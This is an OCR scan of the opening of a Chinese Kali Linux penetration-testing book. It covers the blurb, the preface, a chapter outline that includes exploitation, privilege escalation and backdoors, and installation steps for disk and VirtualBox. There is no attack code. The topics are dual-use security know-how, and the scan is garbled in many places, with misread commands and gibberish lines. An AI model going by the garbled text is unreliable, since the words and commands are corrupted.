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内 容 提要 


Kali Linux 是 一 个 渗透 测试 兼 安全 审计 平台 ， 集 成 了 多 款 漏洞 检 
测 、 目 标识 别 和 漏洞 利用 工具 ， 在 信息 安全 业界 有 着 广泛 的 用 途 。 

本 书 从 业务 角度 出 发 ， 通 过 真实 攻击 案例 并 辅 之 以 各 种 实用 的 黑 
客 工 具 ， 探 讨 了 进行 渗透 测试 所 需 的 各 种 准备 工序 和 操作 流程 。 本 书 
共 分 为 12 章 ， 其 内 容 涵盖 了 Kali Linux 的 使 用 、 渗 透 测 试 方法 论 、 收 
集 评 估 项 目 需求 的 标准 流程 、 信 息 收 集 阶 段 的 工作 流程 、 在 目标 环境 
中 探测 终端 设备 的 方法 、 服 务 枚 举 及 用 途 、 漏 洞 映 射 、 社 会 工程 学 、 
漏洞 利用 、 提 升 权 限 、 操 作 系统 后 门 和 Web 后 文 的 相关 技术 、 渗 透 测 
试 文档 报告 的 撰写 等 。 

本 书 适合 讲解 步骤 清晰 易 懂 、 示 例 丰 富 ， 无 论 是 经 验 丰 富 的 渗透 
测试 老手 ， 还 是 刚 入 门 的 新 手 ， 都 会 在 本 书 中 找到 需要 的 知识 。 
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漏洞 检测 、 目 标识 别 和 漏洞 利用 工具 。 在 明确 业务 目标 的 情况 下 ， 测 
试 人 员 采 取 适 当 的 渗透 测 斌 方法论， 结合 详 细 的 测试 计划 即 可 进行 富 
有 成 效 的 渗透 测试 。 

本 书 循 序 渐进 地 演示 了 多 款 尖端 的 黑客 工具 ， 连 贯 地 介绍 了 各 种 
实用 的 黑客 技术 ， 是 一 本 系统 化 地 讲解 渗透 测试 技巧 的 图 书 。 它 从 业 
务 的 角度 出 发 ， 以 时 下 数字 时 代 的 真实 攻击 案例 入 手 ， 探 讨 了 所 需 的 
各 种 必要 的 准备 工序 和 测试 流程 。 

本 书 揭示 了 渗透 测试 的 最 优 逻 辑 思路 和 业内 最 佳 的 测试 方法 。 

本 书 最 先 讲解 了 实验 室 的 制备 方法 ， 依 次 说 明了 基本 的 安装 和 配 
置 方法 ， 讨 论 了 渗透 测试 的 不 同类 型 ， 介 绍 了 开放 的 安全 测试 方法 ， 
并 提出 了 Kali Linux 特有 的 测试 过 程 。 在 此 之 后 ， 本 书 将 遵循 正式 的 
测 斌 方法论， 依据 渗透 测试 各 个 阶段 (范围 界定 、 信 息 收 集 、 目 标 发 
现 、 服 务 枚 举 、 漏 洞 映 射 、 社 会 工程 学 、 提 升 权 限 、 访 问 维护 和 文档 
报告 ) 的 需要 介绍 相应 的 测试 工具 。 我 们 会 通过 真实 的 渗透 案例 来 演 
示 这 些 工具 的 使 用 和 配置 方法 。 本 书 最 后 一 部 分 还 简要 介绍 了 额外 的 
渗透 工具 以 及 渗透 测试 人 员 通 常会 参考 的 重要 资源 。 

本 书 从 零 起 步 介绍 了 渗透 测试 的 必 备 技能 ， 可 作为 读者 专业 且 实 
用 的 专家 指导 。 在 学 习 本 书 的 内 容 之 后 ， 读 者 可 以 在 现实 环境 中 或 者 
在 实验 测试 平台 中 使 用 Kali Linux 进行 渗透 测试 。 

本 书 内 容 


?81XÉ, Kali Linux 入 门 。 简要 介绍 Kali Linux 的 Live DVD 的 使 用 
方法 。 本 章 首先 介绍 Kali Linux 的 研发 简 史 和 各 类 工具 ， 然 后 介绍 获 
取 、 使 用 、 配 置 、 更 新 Kali Linux 的 方法 ， 以 及 多 个 重要 网 络 服务 

(HTTP ^ MySQL ^ SSH) 的 配置 方法 。 最 后 ， 本 章 还 演示 了 使 用 镜 
像 文 件 安 装 并 配置 一 台 漏 洞 百 出 的 问题 虚拟 机 ， 以 及 安装 额外 工具 包 
的 方法 。 

第 2 章 ， 渗 透 测 斌 方法论。 探讨 了 标准 渗透 测试 的 基本 概念 、 规 
则 、 管 理 、 方 法 和 流程 。 本 章 将 介绍 两 种 著名 的 类 型 渗透 测试 ， 即 黑 
盒 测 试 和 白 盒 测试 之 间 的 明显 区 别 。 另 外 ， 它 还 分 析 了 脆弱 性 评估 和 
渗透 测试 之 间 的 区 别 。 本 章 重 点 讲解 了 各 种 渗透 测试 方法 论 的 业务 特 
性 、 功 能 和 优点 ， 分 别 讨论 了 OSSTMM、ISSAF、OWASP 和 WASC- 
TC。 最 后 ， 介 绍 了 由 10 个 连贯 的 测试 阶段 组 成 的 Kali Linux 的 通用 渗 
透 测试 流程 。 

第 3 章 ， 范 围 界 定 。 阐述 收集 评估 项 目 需求 的 标准 流程 。 本 章 将 
前 述 制 定 渗透 测试 项 目 工作 路 线 图 所 需 的 各 个 要 素 。 这 个 阶段 的 工作 
可 分 为 多 个 关键 步 又， 即 收集 需求 、 筹 划 工 作 、 边 界 分 析 、 明 确 业 务 
指标 、 项 目 管理 和 统筹 调度 。 本 章 讲解 获取 测试 环境 具体 信息 的 方 
TE ° 

第 4 章 ， 信 息 收 集 。 介绍 信息 收集 阶段 的 工作 流程 。 本 章 首 先 演 
示 了 通过 公共 资源 获取 目标 环境 有 关 信 息 的 方法 ， 然 后 介绍 了 分 析 
DNS 信息 和 收集 网 络 路 由 信息 的 手段 ， 最 后 讲解 了 利用 搜索 引擎 获取 
目标 域名 、E-mail 地 址 和 文件 元 数据 的 技术 。 

第 5 章 ， 目 标识 别 。 讲解 了 在 被 测 环境 中 探索 终端 设备 的 方法 。 
本 章 介绍 了 目标 识别 阶段 的 任务 以 及 相应 的 工具 ， 以 及 对 目标 主机 进 
行 操作 系统 指纹 识别 的 各 种 工具 。 

第 6 章 ， 服 务 枚 举 。 探讨 了 服务 枚 举 及 其 用 途 。 本 章 介绍 了 端口 
扫描 的 概念 和 相关 工具 。 本 章 重 点 介绍 Nmap 的 各 种 可 用 选项 ， 以 及 在 


被 测 网 络 中 搜索 SMB、SNMP 和 VPN 服 务 的 各 种 工具 。 

第 7 章 ， 漏 洞 映 射 。 讨 论 了 漏洞 的 两 种 类 型 : 本 地 漏洞 和 远程 漏 
洞 。 您 将 在 本 章 了 解 漏洞 区 分 依据 和 分 类 方法 ， 及 各 种 行业 标准 。 此 
Ih, KEY T OpenVAS ` Cisco ` Fuzzing ` SMB ` SNMP 和 Web 应 
用 程序 分 析 工 具 ， 这 些 工具 可 以 用 来 查找 、 分 析 目 标 网 络 种 存在 的 安 
Aii] o 

第 8 章 ， 社 会 工程 学 攻击 。 介绍 了 社会 工程 学 专业 人 员 操 纵 他 
人 ， 使 后 者 泄露 信息 或 进行 某 种 行为 的 核心 原则 和 业内 认可 的 做 法 。 
本 章 将 前 述 社 工 涉 及 的 基本 心理 学 原理 。 社 会 工程 学 专业 人 十 制定 的 
社工 目标 和 具体 方法 都 是 基于 这 些 心 理学 原理 。 本 章 还 通过 实际 案例 
讲解 了 社工 的 攻击 流程 和 攻击 方法 。 本 章 最 后 介绍 了 Kali Linux 的 社 
会 工程 学 工具 集 ， 并 演示 了 利用 这 些 工 具 攻 击 人 力 资源 部 门 的 社工 方 
法 。 

第 9 章 ， 漏 润 利 用 。 重点 介绍 了 可 切实 利用 漏洞 的 实践 方法 和 各 
种 工具 。 本 章 讲解 了 漏洞 研究 领域 的 各 个 方面 ， 以 及 理解 、 检 验 和 测 
试 目 标 环境 脆弱 性 的 关键 手 段 。 本 章 还 列举 了 一 些 知 名 的 漏洞 资料 库 
和 使 用 方法 。 同 时 ， 本 章 还 从 安全 评估 的 角度 讲解 了 恶名 昭 朝 的 开发 
工具 包 ， 并 演示 了 使 用 Metasploit 的 exploit 模 块 编 写 简 单 的 漏洞 利用 程 
FRINTTIE © 

第 10 章 ， 提 升 权限 。 介绍 了 提升 权限 、 网 络 监听 及 网 络 欺骗 的 概 
念 。 本 章 不 仅 介绍 了 通过 本 地 漏洞 提升 权限 的 方法 ， 而 且 介 绍 了 分 别 
以 离线 和 在 线 的 方式 碰撞 用 户 密码 的 工具 。 本 章 最 后 还 讲解 了 可 用 于 
网 络 其 蚤 和 网 络 监听 的 多 款 工具 。 

第 11 章 ， 访 问 维护 。 演示 了 操作 系统 后 门 和 Web 后 门 的 有 关 技 
术 。 本 章 介绍 了 各 种 不 同 的 后 门 及 其 使 用 方法 。 此 外 ， 本 章 还 讲解 了 
多 款 网 络 隧道 工具 ， 这 些 工 具 可 以 在 攻击 者 和 受害 者 之 间 建 立 秘密 通 


信 。 


第 12 章 ， 文 档 报 告 。 涵 盖 了 渗透 测试 文档 、 汇 报 文件 和 现场 演示 
的 有 关内 容 。 本 章 内 容 旨 在 指导 读者 以 撰写 系统 化 的 、 结 构 化 的 、 一 
致 的 工程 文档 。 此 外 ， 本 章 还 介绍 了 验证 测试 结果 、 报 告 的 不 同 种 
类 、 现 场 演示 及 测试 的 后 期 流程 工作 。 

附录 A， 辅 助 工 具 。 介绍 了 渗透 测试 工作 可 能 会 用 到 的 几 球 额外 
HM 

附录 B ， 关 键 资源 。 列 举 了 多 个 可 帮助 您 提高 渗透 测试 技术 的 参 

阅读 群体 

本 书 适合 大 体 了 解 UNIX/Linux 操 作 系 统 ， 并 了 解 信 息 安 全 各 项 构 
成 因素 的 芽 安 全 专业 人 士 或 网 络 管理 员 ， 以 及 想 要 使 用 Kali Linux 进 
行 渗 透 测 试 的 读者 。 


1 PARI = li 


第 1 章 Kali Linux A1] 
第 2 章 渗透 测试 方法 论 


第 1 章 Kali Linux 入 | ] 


本 章 将 带领 读者 初步 了 解 渗 透 测试 专用 的 独立 Linux 操作 系统 
Kali Linux。 本 章 涵盖 下 述 主题 ; 

e Kali 的 发 展 简 史 ; 

e Kali 的 一 般 用 途 ; 

e Kali 的 下 载 与 安装 ; 

e Kali 的 配置 与 更 新 。 

在 本 章 的 结尾 部 分 ， 我 们 还 会 介绍 Kali Linux 附加 功能 包 和 配置 工 
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1.1 Kali 的 发 展 简 史 


Kali Linux (Kali) 是 专门 用 于 渗透 测试 的 Linux 操 作 系 统 ， 它 由 
BackTrack 发 展 而 来 。 在 整合 了 IWHAX、WHOPPIX 和 Auditor 这 3 种 
渗透 测试 专用 Live Linux 之 后 ，BackTrack 正 式 改 名 为 Kali Linux ° 

BackTrackzé 4H 24 7E 4 HJ Linux Z 11 hU ° fEBackTrack/E 764.070 93, 
版 的 时 候 ， 它 的 下 载 次 数 已 经 超过 了 400 万 次 。 


Kali Linux 1.0 版 于 2013 年 3 月 12 日 问世 。 在 5 天 之 后 ， 官 方 为 修复 
USB 键盘 的 支持 问题 而 发 布 了 1.0.1 版 。 在 这 短 短 的 5 天 之 内 ，Kali 的 
下 载 次 数 束 超过 了 9 万 次 。 

根据 官网 的 介绍 ( http://docs.kali.org/introduction/what-is-kali- 
linux) ， Kali 的 主要 特色 有 : 

e 它 是 基于 Debian 的 Linux 发 行 版 ; 

e 它 集 成 300 多 个 渗透 测试 程序 ; 

e 它 文 持 绝 大 多 数 的 无 线 网 卡 ; 

CHB TAKUM Te) BAILA, 

e 所 有 的 软件 包 都 有 研发 团队 的 PGP 签名 ; 

e 用 户 可 以 目 制 满足 各 上 自 需求 的 Kali Linux 发 行 版 ; 

e 支持 基于 ARM 的 硬件 系统 。 


1.2 Kali Linux 工 具 包 


Kali Linux 含有 可 用 于 渗透 测试 的 各 种 工具 。 这 些 工具 程序 大 体 可 
以 分 为 以 下 几 类 。 

e 信息 收集 : 这 类 工具 可 用 来 收集 目标 的 DNS、IDS/IPS、 网 络 扫 
描 、 操 作 系 统 、 路 由 、SSL、SMB、VPN、VoIP、SNMP 信 息 和 E-mail 
地 址 。 

e 漏洞 评估 : 这 类 工具 都 可 以 扫描 目标 系统 上 的 漏洞 。 部 分 工具 可 
以 检测 Cisco 网 络 系统 缺陷 ， 有 些 还 可 以 评估 各 种 数据 库 系 统 的 安全 间 
题 。 很 多 模糊 测试 软件 都 属于 漏洞 评估 工具 。 

e Web Fd: 即 与 Web 应 用 有 关 的 工具 。 它 包括 CMS (AA BHA 
扫描 器 、 数 据 库 漏 洞 利 用 程序 、Web 应 用 模糊 测试 、Web 应 用 代 
理 、Web 疏 虫 及 Web 漏 洞 扫 描 器 。 


Zi 


ed 


e 密码 攻击 : 无 论 是 在 线 攻 击 还 是 离线 破解 ， 只 要 是 能 够 实施 密码 
攻击 的 工具 都 属于 密码 攻击 类 工具 。 

e 漏洞 利用 : 这 类 工具 可 以 利用 在 目标 系统 中 发 现 的 漏洞 。 攻 击 网 
络 、Web 和 数据 库 漏 洞 的 软件 ， 都 属于 漏洞 利用 (exploitation) 工具 。 
Kali 中 的 某 些 软件 可 以 针对 漏洞 情况 进行 社会 工程 学 攻击 。 

e 网 络 监听 : 这 类 工具 用 于 监听 网 络 和 Web 流量 。 网 络 监听 需要 
进行 网 络 欺骗 ， 所 以 Ettercap 和 Yersinia 这 类 软件 也 归于 这 类 软件 。 

e 访问 维护 : 这 类 工具 帮助 渗透 人 员 维持 他 们 对 目标 主机 的 访问 
权 。 某 些 情况 下 ， 渗 透 人 员 必 须 移 获取 主机 的 最 高 权限 才能 安装 这 类 
软件 。 这 类 软件 包括 用 于 在 web 应 用 和 操作 系统 安装 后 门 的 程序 ， 以 
及 隧道 类 工具 。 

e 报告 工具 : 如 果 您 需要 撰写 渗透 测试 的 报告 文件 ， 您 应 该 用 得 上 


e 系统 服务 ， 这 是 渗透 人 员 在 渗透 测试 时 可 能 用 到 的 常见 服务 类 软 
件 ， 它 包括 Apache 服 务 、MySQL 服 务 、SSH 服 务 和 Metasploit 服 务 。 

为 了 降低 渗透 测试 人 员 筛 选 工具 的 难度 ，Kali Linux 单独 划分 了 一 
类 软件 一 一 Top 10 Security Tools， 即 10 大 首选 安全 工具 。 这 10 大 工具 


分 别 是 aircrack-ng、burp-suite、hydra、john、maltego、metasploit ^ 


nmap 、 sqlmap 、 wireshark 和 zaproxy ° 

除了 可 用 于 渗透 测试 的 各 种 工具 以 外 ，Kali Linux 还 整合 了 以 下 几 
类 工具 。 

e 无 线 攻 击 : 可 攻击 蓝牙 、RFID/NFC 和 其 他 无 线 设备 的 工具 。 

e 逆向 工程 ， 可 用 于 调试 程序 或 反 汇编 的 工具 。 

e 压力 测试 : 用 于 各 类 压力 测试 的 工具 集 。 它 们 可 测试 网 络 、 无 
线 、Web 和 VoIP 系统 的 负载 能 

e 便 件 破解 : 用 于 调试 Android 和 Arduino 程序 的 工具 。 


e 法 证 调查 : BURA HUERY TB o EAN PLS ay DUET ER A 
磁盘 镜像 、 文 件 分 析 、 硬 盘 镜 像 分 析 。 如 需 使 用 这 类 程序 ， 首 先 要 在 
启动 业 单 里 选择 Kali Linux Forensics | No Drives or Swap Mount。 在 开 
局 这 个 选项 以 后 ，Kali Linux 不 会 目 动 加 载 硬盘 驱动 器 ， 以 你 护 人 硬盘 数 
据 的 完整 性 。 

本 书 仅 介绍 Kali Linux 的 渗透 测试 工具 。 


1.3 下 载 Kali Linux 


要 安装 使 用 Kali Linux， 首 先 需 要 下 载 它 。 下 载 Kali Linux 的 官方 网 
vii http://www. kali.org/downloads/ ° 

在 下 载 页 面 中 〈 见 图 1.1) ， 您 可 以 通过 下 列 项 目 选择 适用 的 Kali 
Linux 镜像 。 


www.kali.org/dow 
Downloads 
Kali 1.0 -| 
como (officia "| (Gnome E (iso E Direci "| 
amd64 
armel " 101 
armhf 
| 4165050t3709e6046274153232a3ee2e89f80f2e83 
| Download Kali | 
图 1.1 


e 主机 架构 : i386、amd64、armel 或 armhf ° 

e 镜像 类 型 : ISO 或 VMware 镜像 。 

如 果 您 想 要 把 镜像 烧 录 为 DVD 光盘 ， 或 者 在 主机 上 安装 Kali 
Linux， 就 需要 下 载 ISO 镜 像 。 但 是 如 需 在 VMware 里 使 用 Kali Linux, 
直接 下 载 VMware 镜像 ， 然 后 再 在 虚拟 机 环境 里 安装 和 配置 Kali 系 统 
为 方便 。 

在 下 载 镜像 文件 之 后 ， 您 需要 校 验 镜像 文件 的 SHA1 哈 希 值 是 否 
和 下 载 网 站 上 提示 的 哈 希 值 _ 致 。 检 查 SHAT1 哈 希 值 主要 为 了 确保 下 


载 镜 像 文件 的 完整 性 。 这 步 工 作 可 以 使 您 免 受 文件 下 载 不 完整 而 市 来 
的 灾难 ， 也 可 验证 文件 是 否 用 被 他 人 鞭 意 算 改 。 

在 UNIX/Linux/BSD 操 作 系统 中 ， 您 可 以 直接 使 用 shalsum 命 令 检 
查 下 载 文 件 的 哈 硕 值 。 因 为 镜像 文件 很 大 ， 所 以 计算 哈 希 值 的 时 间 可 
能 较 长 。 例 如 ， 您 可 以 使 用 下 壕 指 令 检查 kali-linux-1.0.1-i386.iso 文 件 的 
哈 布 值 : 

shalsum kali-linux-1.0.1-i386.iso 

41e5050f8709e6cd6a7d1baaa3ee2e89f8dfae83 kali-linux-1.0.1-1386.iso 

很 多 Windows 程 序 都 可 以 生成 SHA1 的 哈 希 值 。 我 们 推荐 读者 使 用 
shalsum , € 可 在 下 xb 网 址 下 X 
http://www.ring.gr.jp/pub/net/gnupg/binary/shalsum.exe ° 

shalsum 短小 实用 。 如 果 您 想 要 党 试 其 他 程序 ， 可 考虑 
HashMyFiles ( http://www. nirsoft.net/utils/hash my files.html ) ° 
HashMyFilesfi£ 8j it MD5 ` SHA1 ^ CRC32 ` SHA-256 ` SHA-3847fl 
SHA-512 算 法 的 哈 希 值 。 

下 载 HashMyFiles 之 后 ， 打 开 这 个 程序 ， 在 染 单 里 选择 File | Add 
Files 或 直接 按 快捷 键 f2， 则 可 添加 需要 计算 哈 希 值 的 文件 。 

使 用 HashMyFiles 计算 Kali Linux i386 ISO 镜像 的 哈 希 值 ， 情 况 会 
如 图 1.2 所 示 。 


同 ， 


O www.kali.org/downloads/ 


Download your flavour of Kali Linux 


Fiename | kali-hnux-1.0 1-(386 iso 
sha1sum | 41e5050(8709e6c d6a7d1baaa3ee2eB9f8df ae83 
Size (MB) [2285 


图 1.2 
在 使 用 shalsum、HashMyFile 这 类 工具 计算 下 载 文 件 的 哈 希 值 之 
您 需要 将 其 与 网 页 所 示 的 哈 希 值 进 行 比较 ， 检 查 它们 是 否 相 同 。 
如 有 果 两 个 值 相同 ， 那 您 可 直接 进入 下 节 的 操作 。 如 有 果 两 个 值 不 相 
那么 就 说 明 您 下 载 的 文件 有 问题 ， 您 可 能 需要 在 官方 的 镜像 下 载 


网 站 重新 下 载 有 关 文 件 。 


1.4 Kali Linux 


Kali Linux 有 以 下 几 种 使 用 方式 : 

e 可 以 直接 通过 Live DVD 运行 Kali Linux; 

e 可 以 在 硬盘 上 安装 并 运行 Kali Linux; 

e 可 以 在 USB 磁盘 上 安装 Kali Linux 〈 即 portable Kali Linux) ° 
后 续 几 个 小 季 将 简要 介绍 这 几 种 安装 方式 。 


1.4.1 Live DVD 方式 


如 有 果 您 想 要 跳 过 安装 过 程 直 接 使 用 Kali Linux， 您 可 以 把 ISO 镜像 
录制 在 DVD 光盘 上 。 制 备 好 光盘 以 后 ， 就 可 以 直接 通过 DVD 光 盘 启 动 
Kali。 当 然 ， 您 需要 事先 设置 好 BIOS， 使 其 从 光驱 启动 操作 系统 ， 

通过 Live DVD 的 方式 启动 Kali Linux， 最 大 的 优点 就 是 安装 速度 快 
且 易 用 性 较 好 。 

PEE, Live DVD 的 方式 有 几 个 不 可 避免 的 局 限 。 例 如 ， 在 重 
新 启动 系统 之 后 ， 设 置 好 的 文件 和 配置 都 会 丢失 。 另 外 ， 因 为 DVD 光 
盘 的 读 写 速 度 比 硬盘 的 速度 慢 很 多 ， 以 DVD 光盘 的 方式 运行 Kali 
Linux 系统 ， 其 运行 速度 远 远 不 如 在 硬盘 上 安装 的 Kali Linux 系 统 。 

我 们 推荐 仅 在 测试 的 情况 下 以 Live DVD 的 运行 方式 运行 Kali 
Linux。 如 果 您 需要 在 日 常 工作 里 使 用 Kali Linux， 我 们 推荐 您 首先 安装 
Kali Linux， 然 后 再 使 用 它 。 


1.4.2 硬盘 安装 

硬盘 安装 Kali Linux 的 方式 分 为 以 下 两 种 : 

e 安装 在 物理 机 /真实 主机 上 (常规 安装 ) ; 

e 安装 在 虚拟 机 上 。 

通常 我 们 会 把 Kali Linux 安装 在 虚拟 机 上 。 

1. 安装 在 物理 主机 上 

在 物理 (真实 ) 主机 上 安装 Kali Linux 之 前 ， 请 务必 确认 整个 硬盘 
是 空 磁盘 。 即 使 您 的 硬盘 上 有 数据 ， 在 以 硬盘 方式 安装 Kali 系 统 时 ， 安 
装 程序 (默认 选项 ) 将 会 把 整个 硬盘 格式 化 。 要 想 轻 松 安装 这 个 系 
统 ， 最 好 把 整个 硬盘 都 分 配给 Kali 使 用 。 如 果 您 的 主机 已 经 装 有 其 他 操 
作 系 统 ， 则 需要 划分 出 一 个 单独 的 分 区 给 Kali Linux。 总 之 ， 在 有 数据 
的 硬盘 上 安装 Kali Linux 时 应 当 格外 小 心 ， 以 免 破坏 原 有 数据 。 

Kali Linux 官 方 网 站 介绍 了 在 Windows 操 作 系 统 的 主机 上 安装 Kali 
Linux 的 具体 方法 。 如 需 查 询 ， 请 访问 下 述 网 址 : 


http://docs.kali.org/installation/dual- boot-kali-with-windows ° 
RE TT DX LAARS ^ ATUS LATUR, RDXeBEBULinux Live CD 
有 : 


e SystemRescueCD  (http://www.sysresccd.org/) ; 

e GParted Live (http://gparted.sourceforge.net/livecd.php) ; 

e Kali Linux (http://www.kali.org) ° 

-ExtiLinux Live CDA E FH AIZIR, MCA BRIE Sew RT 
以 管理 磁盘 分 区 。 在 使 用 Linux Live CD 的 磁盘 分 区 工具 之 前 ， 建 议 您 
事 移 备份 好 硬盘 上 的 重要 数据 。 虽 然 我 们 认为 上 述 工 具 都 安全 可 靠 ， 
没 遇 到 过 事故 ， 但 是 小 心 驶 得 万 年 船 ， 如 果 人 硬盘 上 有 重要 数据 最 好 还 
是 事先 备份 一 下 。 

在 您 划分 好 相应 分 区 ， 或 者 决定 使 用 整个 硬盘 安装 系统 时 ， 束 可 
以 从 Kali Linux Live DVD 局 动 ， 然 后 从 局 动 来 单 中 选择 Install 或 者 
Graphical install ° 

从 光盘 系统 之 后 ， 您 就 会 看 到 安装 界面 〈 见 图 1.3) 。 在 安装 过 程 
中 ， 需 要 设置 的 几 个 地 方 如 下 所 示 。 

1. 需要 在 安装 过 程 中 设置 系统 语言 。 默 认 系统 语言 是 英文 。 

2. 通过 下 拉 选 项 设置 国 别 。 

3. 设置 区 域 选 项 (localesetting) 。 默 认 情 况 下 ， 地 区 为 
UnitedStates， 编 码 集 是 en_US.UTF-8。 

4. 您 需要 设置 键盘 布局 (keymap) 。 通 常情 况 下 ， 设 置 美式 键盘 

(American English) 就 可 以 了 。 


RKAPIPINUR 


Boot menu 
Live (686 pae ) 
Liwe (686-pae failsafe) 
Live (forensic mode) 
Install 
Graphical install 


Advanced options 


Press ENTER to boot or TAB to edit a menu entry 
图 1.3 

安装 程序 会 询问 您 主机 名 称 、 域 名 等 网 络 配置 。 
安装 程序 会 在 下 一 步 提 示 您 设置 root 密 码 。 
安装 程序 接 下 来 帮 您 设置 时 区 。 
.在 硬盘 分 区 阶段 ， 安 装 程序 会 进行 磁盘 分 区 。 如 果 您 使 用 的 硬 
熏 没 有 数据 ， 则 可 选用 默认 的 Guided - use entire disk 选项 。 如 果 您 的 主 
机 安装 有 其 他 操作 系统 ， 您 可 能 首先 分 配 分 区 给 Kali Linux 使 用 ， 这 就 
lo eee ELF SEE ERK EE Xo AAP ARTES 
的 选择 创建 相应 的 分 区 。 

9. 安装 程序 会 o: 区 方案 。 默 认 情 况 下 ，Kali 会 推 
存 Allfilesinonepartition， 即 把 所 有 文件 写 在 一 个 分 区 里 。 考 虑 到 日 后 可 
能 重新 安装 系统 ， 通 常 需 要 保留 home 文 件 夹 里 的 文件 ， 选 择 


oN o c 


cee partition 会 更 好 。 之 后 ， 您 要 根据 自己 的 需要 设置 /home 
分 区 的 大 小 。 如 果 要 把 所 有 文件 都 放 在 /home 目录 (分 区 ) 里 ， 您 可 能 
需要 把 分 区 大 小 设置 得 大 一 些 (大 于 50GB) 。 一 般 而 言 ， 把 这 个 分 区 
的 大 小 设置 为 10GB 到 20GB 就 可 以 了 。 
10. 安装 程序 会 总 结 您 的 分 区 设置 ， 如 图 1.4 所 示 。 在 您 确认 之 


后 ， ood 分 区 管理 操作 © 

11. 接 下 来 ， 安 装 程序 开始 安装 Kali Linux 系统 。 这 个 过 程 可 能 会 
比较 长 ， E. BWE Kali Linux 安装 在 硬盘 上 了 。 在 我 们 的 测试 环 
境 下 ， 整 个 安装 过 程 耗 时 20 分 钟 左右 。 


partition disks 


If you continue, the —— listed below will be written to the disks. Otherwise, you will be able to make 
further changes manually. 


The partition —— of the following devices are changed: 
SCSI1 (0,0,0) (sda) 


arr eu partitions are going to yo ira 
rtition #1 of SCSI1 (0,0,0) (sda) as 
eme #5 of SCSI1 (0,0,0) (sda) as €— 


Wnte the changes to disks? 
No 


© Yes 


图 1.4 
12. 完成 上 述 安装 过 程 之 后 ， 安 装 程序 会 提示 您 配置 软件 包 


E CRUS (启动 管理 程序 ) as s 
在 设置 两 个 选项 时 ， 采 用 默认 的 设置 不 会 有 什么 问题 。 请 注意 ， d 
您 的 主机 上 安装 有 其 他 操作 系统 ， 您 可 能 不 应 当 在 MBR 上 安 
GRUB 。 

13. 如 果 您 看 到 如 图 1.5 所 示 的 信息 ， 那 么 您 的 主机 已 经 成 功 安 
了 Kali 系 统 。 


Finish the installation 


installabon complete 
(e Installation is complete, so it is time to boot into your new system. Make sure to remove the 


installation media (CD-ROM, floppies), so that you boot into the new system rather than 
restarting the installation. 


Screenshot Go Back Continue 


图 1.5 
14. 选择 Continue 就 会 重新 启动 计算 机 ， 测 试 刚 刚 安装 好 的 Kali 系 


统 。 在 重新 局 动 计算 机 之 后 ， 您 将 看 到 Kali 的 登录 界面 〈 见 图 1.6) 。 


b 


kali 
Other 
Username: 
System Default v Cancel Log In 


图 1.6 


15. 现在 ， 输 入 您 在 安装 过 程 中 指定 的 用 户 名 和 密码 就 可 以 使 用 
Kali 系 统 了 。 

2. 安装 在 虚拟 机 上 

您 也 可 以 在 虚拟 机 系统 里 安装 Kali Linux。 采 用 这 种 方式 安装 Kali 
Linux 系统 ， 无 须 单 独 准备 物理 硬盘 (或 分 区 ) ， 也 不 会 影响 主机 上 已 
有 的 操作 系统 。 

本 文 使 用 VirtualBox (http://www.virtualbox.org) 虚拟 机 系统 。 
VirtualBox 是 开放 源 代码 的 虚拟 化 软件 ， 文 持 Windows、Linux、OS X 和 
Solaris 操 作 系 统 » 

在 虚拟 机 里 运行 Kali Linux， 比 在 物理 机 上 运行 的 Kali Linux 系统 
的 性 能 差 。 

我 们 既 可 以 通过 ISO 镜像 在 虚拟 机 里 安装 Kali Linux 系统 ， 也 可 
以 直接 下 载 VMware 磁盘 镜像 直接 加 载 Kali Linux 系统 。 采 用 前 面 一 种 
方法 的 安装 时 间 较 长 ， 但 是 可 以 更 为 详细 地 调整 Kali 的 设置 。 

在 虚拟 机 里 使 用 ISO 镜像 安装 Kali 

在 虚拟 机 里 通过 ISO 镜像 安装 Kali Linux 的 详细 步骤 如 下 。 

1. 在 VirtualBox 的 工具 栏 里 选择 New， 创 建 一 个 新 的 虚拟 机 。 

2. 设置 虚拟 机 的 名 称 和 操作 系统 类 型 。 本 例 中 ， 我 们 设置 VM 的 
名 称 为 Kali Linux， 并 选择 操作 系统 为 Linux 一 Debian ( 见 图 1.7) ° 

3 分配 虚拟 机 的 内 存 。 内 存 分 配 的 越 多 ， 虚 拟 机 的 性 能 也 就 越 
好 。 本 例 中 ， 我 们 分 配给 Kali Linux 的 虚拟 机 2048MB AZ ( 见 图 
1.8) 。 请 注意 ， 您 不 可 能 把 主机 所 有 内 存 都 分 配给 虚拟 机 使 用 ， 因 为 
您 主机 的 操作 系统 也 要 使 用 内 存 。 


Name and operating system 


Please choose a descriptive name for the new virtual machine and select the 

type of operating system you intend to install on &. The name you choose 

wil be used throughout VirtuaBox to identify this machine. 

Name: Kal Linux 
[出 

Verson: [aaa 


(tide Descrocon) (_next  ]| Gm | 


图 1.7 


Memory size 


Select the amount of memory (RAM) in megabytes to be allocated to the 
virtual machine. 


The recommended memory sve is 384 MB. 


图 1.8 
4. 设置 虚拟 机 的 硬盘 。 您 可 以 设置 虚拟 硬盘 文件 的 类 型 为 VDI。 
这 种 格式 的 虚拟 硬盘 文件 可 以 动态 调整 文件 大 小 。 我 们 推荐 您 分 配给 
虚拟 机 32GB 以 上 的 虚拟 硬盘 〈 见 图 1.9) 。 如 果 您 日 后 需要 安装 软件 ， 
就 需要 把 虚拟 硬盘 设置 得 更 大 一 些 。 


File location and size 


Please type the name of the new virtual hard drive file into the box below or cick on 
the folder icon to select a different folder to create the file in. 


D:\VMs\Pentest\Kal Linux Kali Linux.vdi a 


Select the sze of the virtual hard drive n megabytes. This sze is the imit on the 
amount of fie data that a virtual machine wil be able to store on the hard drive. 


- | Q9————— C xke 


4,00 MB 2,00 TB 


图 1.9 
5. 完成 上 述 步 又 之 后 ， 虚 拟 机 清单 里 会 列 出 刚才 新 建 的 虚拟 机 。 
6. 如 需 通 过 Kali Linux 的 ISO 镜 像 安装 系统 ， 要 在 VirtualBox 菜 单 
里 选中 那个 虚拟 机 ， 然 后 点 击 Storage 菜 单 进行 配置 ( 见 图 1.10) 。 


Kali Linux 
(C (^ Powered Off 


@ Kali (Testing) Display 
中 Running Video Memory: 12 MB 
Remote Desktop Server: Disabled 


© Storage 


Controller: IDE 
IDE Secondary Master: [CD/DVD] Empty 
Controller: SATA 
SATA Port 0: Kali Linux.vdi (Normal, 32,00 GB) 


© Mobile 


{P Audio 


Host Driver: Windows DirectSound 
Controler: ICH AC97 


@ network 

Adapter 1: Intel PRO/1000 MT Desktop (NAT) 
@ use 

Device Fitters: 0 (0 active) 

园 Shared folders 

None 

9 Description 

None 


图 1.10 

